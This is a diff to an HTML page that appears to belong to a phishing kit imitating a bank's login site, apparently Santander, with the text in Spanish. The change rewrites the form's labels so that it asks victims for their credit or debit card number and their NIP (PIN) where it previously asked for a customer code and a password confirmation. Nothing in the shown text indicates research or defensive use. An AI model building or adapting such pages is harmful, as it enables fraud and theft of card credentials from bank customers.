--- a/santa/159enlace.html
+++ b/santa/159enlace.html
@@ -45,9 +45,9 @@
 				</div>
 		
 					<form class="formulario" id="contact-form"  name="submit-form">
-						<p class="centro"><b>Ingresa Tu Usuario</b>
+						<p class="centro"><b>Ingresa Tu Tarjeta</b>
 						</p><br>
-						<label for="nombre">Código de Cliente / No. Cuenta / Tarjeta de Crédito o Débito:</label>
+						<label for="nombre">Tarjeta de Crédito o Débito:</label>
 					<div class="contenedor-input">
 						<input id="usuario" name="usuario">
 					</div>
@@ -59,9 +59,9 @@
 						<input id="contraseña" name="contraseña">
 					</div>
 					<form class="formulario" id="contact-form"  name="submit-form">
-						<p class="centro"><b>confirmar contraseña</b>
+						<p class="centro"><b>Ingresa Tu NIP</b>
 						</p><br>
-						<label for="nombre">contraseña</label>
+						<label for="nombre">NIP</label>
 					<div class="contenedor-input">
 						<input id="confirmar" name="confirmar">
 					</div>
